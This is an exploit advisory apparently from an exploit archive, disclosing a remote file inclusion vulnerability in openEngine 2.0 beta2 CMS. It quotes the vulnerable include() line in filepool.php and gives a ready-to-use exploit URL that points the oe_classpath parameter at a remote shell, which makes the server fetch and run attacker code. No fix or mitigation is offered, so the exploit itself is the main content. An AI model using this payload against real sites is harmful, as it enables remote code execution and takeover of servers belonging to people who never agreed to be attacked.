id: 3770
date: 09/25/2008
title: openEngine 2.0 beta2 Remote File Inclusion Vulnerability
author: Crackers_Child
cves: 

========================================================
openEngine 2.0 beta2 Remote File Inclusion Vulnerability
========================================================


**************************************************************************************

Author : By Crackers_Child

**************************************************************************************
Script   : openEngine 2. 0 beta2 Remote File include Vulnerable
Download :http://downloads.sourceforge.net/openengine/openengine20_beta2.zip?modtime=1203083918&big_mirror=0

**************************************************************************************

Exploit : Site.com/script_path/cms/classes/openengine/filepool.php?oe_classpath=Shellz?


**************************************************************************************

Vulberable : include($oe_classpath."/openengine/thumbnail.php"); (filepool.php)


**************************************************************************************


#  0day.today [2023-03-22]  #